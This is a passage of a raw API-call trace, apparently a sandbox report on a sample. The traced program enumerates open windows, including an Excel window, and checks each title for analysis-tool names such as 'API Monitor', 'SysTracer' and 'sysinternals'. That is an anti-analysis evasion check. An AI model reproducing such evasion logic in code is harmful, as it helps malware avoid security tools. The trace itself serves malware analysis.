returned="TaskListThumbnailWnd" [0158.705] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65716") returned 5 [0158.705] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.705] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.705] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.705] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.705] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.705] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.705] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") 
returned="ntdll" [0158.705] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.705] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.706] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.706] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.706] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.706] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.706] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.706] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.706] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.706] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.706] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.706] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.706] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.706] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.707] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.707] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.707] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.707] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.707] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.707] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65732") returned 5 [0158.707] lstrcpyA (in: lpString1=0x430400, lpString2="65732" | out: 
lpString1="65732") returned="65732" [0158.707] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.707] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.707] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.707] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.707] GetWindowTextA (in: hWnd=0x100c4, lpString=0x340df8, nMaxCount=1024 | out: lpString="aDU0VK IWA5kLS") returned 14 [0158.707] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.707] lstrcpynA (in: lpString1=0x3401e0, lpString2="aDU0VK IWA5kLS", iMaxLength=1024 | out: lpString1="aDU0VK IWA5kLS") returned="aDU0VK IWA5kLS" [0158.708] lstrcpyA (in: lpString1=0x430800, lpString2="aDU0VK IWA5kLS" | out: lpString1="aDU0VK IWA5kLS") returned="aDU0VK IWA5kLS" [0158.708] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65732") returned 5 [0158.708] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.708] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.708] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.708] GetClassNameA (in: hWnd=0x100c4, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="Desktop User Picture") returned 20 [0158.708] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.708] lstrcpynA (in: lpString1=0x341200, lpString2="Desktop User Picture", iMaxLength=1024 | out: lpString1="Desktop User Picture") returned="Desktop User Picture" [0158.708] lstrcpyA (in: lpString1=0x430c00, lpString2="Desktop User Picture" | out: lpString1="Desktop User Picture") returned="Desktop User 
Picture" [0158.708] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65732") returned 5 [0158.708] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.708] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.708] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.708] strstr (_Str="aDU0VK IWA5kLS", _SubStr="- main thread") returned 0x0 [0158.709] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.709] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.709] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.709] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.709] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.709] strstr (_Str="aDU0VK IWA5kLS", _SubStr="API Monitor") returned 0x0 [0158.709] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.709] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.709] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.709] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.709] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.709] strstr (_Str="aDU0VK IWA5kLS", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.709] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.709] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.710] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.710] lstrcpyA (in: 
lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.710] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.710] strstr (_Str="aDU0VK IWA5kLS", _SubStr="sysinternals") returned 0x0 [0158.710] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.710] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.710] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.710] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.710] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="131558") returned 6 [0158.710] lstrcpyA (in: lpString1=0x430400, lpString2="131558" | out: lpString1="131558") returned="131558" [0158.710] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.710] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.710] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.710] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.711] GetWindowTextA (in: hWnd=0x201e6, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Book1 - Excel") returned 13 [0158.711] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.711] lstrcpynA (in: lpString1=0x340df8, lpString2="Book1 - Excel", iMaxLength=1024 | out: lpString1="Book1 - Excel") returned="Book1 - Excel" [0158.711] lstrcpyA (in: lpString1=0x430800, lpString2="Book1 - Excel" | out: lpString1="Book1 - Excel") returned="Book1 - Excel" [0158.711] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="131558") returned 6 [0158.711] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: 
lpString1="user32") returned="user32" [0158.711] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.711] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.711] GetClassNameA (in: hWnd=0x201e6, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="XLMAIN") returned 6 [0158.711] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.711] lstrcpynA (in: lpString1=0x341200, lpString2="XLMAIN", iMaxLength=1024 | out: lpString1="XLMAIN") returned="XLMAIN" [0158.712] lstrcpyA (in: lpString1=0x430c00, lpString2="XLMAIN" | out: lpString1="XLMAIN") returned="XLMAIN" [0158.712] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="131558") returned 6 [0158.712] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.712] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.712] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.712] strstr (_Str="Book1 - Excel", _SubStr="- main thread") returned 0x0 [0158.712] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.712] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.712] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.712] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.712] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.712] strstr (_Str="Book1 - Excel", _SubStr="API Monitor") returned 0x0 [0158.712] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.712] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.713] lstrcpyA 
(in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.713] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.713] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.713] strstr (_Str="Book1 - Excel", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.713] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.713] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.719] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.719] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.719] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.719] strstr (_Str="Book1 - Excel", _SubStr="sysinternals") returned 0x0 [0158.719] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.719] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.720] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.720] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.720] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="66178") returned 5 [0158.720] lstrcpyA (in: lpString1=0x430400, lpString2="66178" | out: lpString1="66178") returned="66178" [0158.720] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.720] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.720] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.720] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: 
lpString1="GetWindowText") returned="GetWindowText" [0158.720] GetWindowTextA (in: hWnd=0x10282, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.720] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.720] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.720] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.720] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="66178") returned 5 [0158.720] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.720] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.721] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.721] GetClassNameA (in: hWnd=0x10282, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0158.721] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.721] lstrcpynA (in: lpString1=0x341200, lpString2="WorkerW", iMaxLength=1024 | out: lpString1="WorkerW") returned="WorkerW" [0158.721] lstrcpyA (in: lpString1=0x430c00, lpString2="WorkerW" | out: lpString1="WorkerW") returned="WorkerW" [0158.721] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="66178") returned 5 [0158.721] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.721] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.721] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.721] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.721] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.721] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") 
returned="0" [0158.721] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.721] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.721] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.722] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.722] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.722] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.722] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.722] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.722] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.722] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.722] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.722] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.722] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.722] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.722] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.722] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.722] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.722] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.723] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.723] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.723] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: 
param_1="131618") returned 6 [0158.723] lstrcpyA (in: lpString1=0x430400, lpString2="131618" | out: lpString1="131618") returned="131618" [0158.723] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.723] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.723] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.723] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.723] GetWindowTextA (in: hWnd=0x20222, lpString=0x3401e0, nMaxCount=1024 | out: lpString="C") returned 1 [0158.723] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.723] lstrcpynA (in: lpString1=0x340df8, lpString2="C", iMaxLength=1024 | out: lpString1="C") returned="C" [0158.723] lstrcpyA (in: lpString1=0x430800, lpString2="C" | out: lpString1="C") returned="C" [0158.723] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="131618") returned 6 [0158.723] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.723] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.724] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.724] GetClassNameA (in: hWnd=0x20222, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="CFD File Open Message Window") returned 28 [0158.724] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.724] lstrcpynA (in: lpString1=0x341200, lpString2="CFD File Open Message Window", iMaxLength=1024 | out: lpString1="CFD File Open Message Window") returned="CFD File Open Message Window" [0158.724] lstrcpyA (in: lpString1=0x430c00, lpString2="CFD File Open Message Window" | out: 
lpString1="CFD File Open Message Window") returned="CFD File Open Message Window" [0158.724] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="131618") returned 6 [0158.724] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.724] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.724] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.724] strstr (_Str="C", _SubStr="- main thread") returned 0x0 [0158.724] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.724] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.724] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.724] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.724] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.724] strstr (_Str="C", _SubStr="API Monitor") returned 0x0 [0158.725] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.725] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.725] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.725] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.725] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.725] strstr (_Str="C", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.725] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.725] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.725] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") 
returned="ntdll" [0158.725] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.725] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.725] strstr (_Str="C", _SubStr="sysinternals") returned 0x0 [0158.725] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.725] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.726] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.726] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.726] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="197134") returned 6 [0158.726] lstrcpyA (in: lpString1=0x430400, lpString2="197134" | out: lpString1="197134") returned="197134" [0158.726] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.727] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.727] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.727] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.727] GetWindowTextA (in: hWnd=0x3020e, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.727] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.727] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.727] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.727] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="197134") returned 6 [0158.727] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.727] lstrcpyA (in: 
lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.727] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.727] GetClassNameA (in: hWnd=0x3020e, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="MsoStdCompMgr") returned 13 [0158.727] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.727] lstrcpynA (in: lpString1=0x341200, lpString2="MsoStdCompMgr", iMaxLength=1024 | out: lpString1="MsoStdCompMgr") returned="MsoStdCompMgr" [0158.727] lstrcpyA (in: lpString1=0x430c00, lpString2="MsoStdCompMgr" | out: lpString1="MsoStdCompMgr") returned="MsoStdCompMgr" [0158.727] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="197134") returned 6 [0158.728] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.728] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.728] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.728] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.728] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.728] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.728] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.728] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.728] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.728] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.728] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.728] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.728] lstrcpyA (in: lpString1=0x3401e0, 
lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.728] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.728] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.729] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.729] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.729] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.729] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.729] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.729] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.729] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.729] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.729] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.729] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.729] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.729] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65978") returned 5 [0158.729] lstrcpyA (in: lpString1=0x430400, lpString2="65978" | out: lpString1="65978") returned="65978" [0158.729] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.729] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.729] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.730] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.730] 
GetWindowTextA (in: hWnd=0x101ba, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.730] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.730] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.730] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.730] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65978") returned 5 [0158.730] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.730] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.730] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.730] GetClassNameA (in: hWnd=0x101ba, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="XLMAIN") returned 6 [0158.730] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.730] lstrcpynA (in: lpString1=0x341200, lpString2="XLMAIN", iMaxLength=1024 | out: lpString1="XLMAIN") returned="XLMAIN" [0158.730] lstrcpyA (in: lpString1=0x430c00, lpString2="XLMAIN" | out: lpString1="XLMAIN") returned="XLMAIN" [0158.730] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65978") returned 5 [0158.730] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.731] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.731] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.731] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.731] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.731] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.731] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" 
